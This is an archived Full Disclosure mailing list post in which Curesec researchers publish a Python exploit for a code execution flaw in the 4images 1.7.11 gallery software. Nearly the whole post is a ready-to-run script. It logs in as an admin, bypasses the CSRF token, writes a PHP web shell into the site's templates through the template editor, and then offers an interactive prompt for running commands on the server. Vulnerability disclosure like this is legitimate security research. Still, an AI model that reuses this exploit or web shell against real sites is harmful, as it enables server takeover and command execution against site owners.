Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

4images 1.7.11: Code Execution Exploit

From: "Curesec Research Team (CRT)" <crt () curesec com>
Date: Mon, 07 Dec 2015 18:13:00 +0100

#!/usr/local/bin/python
# Exploit for 4images 1.7.11 Code Execution vulnerability
# An admin account is required to use this exploit
# Curesec GmbH

import sys
import re
import argparse
import requests # requires requests lib

parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()

url = args.url
username = args.username
password = args.password

loginPath = "/admin/index.php"
fileManagerPath = "/admin/templates.php"

shellFileName = "404.php"
shellContent = "<?php passthru($_GET['x']); ?>"

def login(requestSession, url, username, password):
    csrfRequest = requestSession.get(url)
    csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)

    postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", "__csrf": csrfToken, "loginusername": 
username, "loginpassword": password}
    loginResult = requestSession.post(url, data = postData).text
    return "loginpassword" not in loginResult

def upload(requestSession, url, fileName, fileContent):
    csrfRequest = requestSession.get(url)
    csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)

    postData = {"action": "savetemplate", "content": fileContent, "template_file_name": fileName, "__csrf": csrfToken, 
"template_folder": "default"}
    loginResult = requestSession.post(url, data = postData).text

def runShell(url):
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = raw_input("$ ")

requestSession = requests.session()

if login(requestSession, url + loginPath, username, password):
    print("successful: login")
else:
    exit("ERROR: Incorrect username or password")

upload(requestSession, url + fileManagerPath, shellFileName, shellContent)

runShell(url + "/templates/default/" + shellFileName + "?x=")


Blog Reference:
https://blog.curesec.com/article/blog/4images-1711-Code-Execution-Exploit-117.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: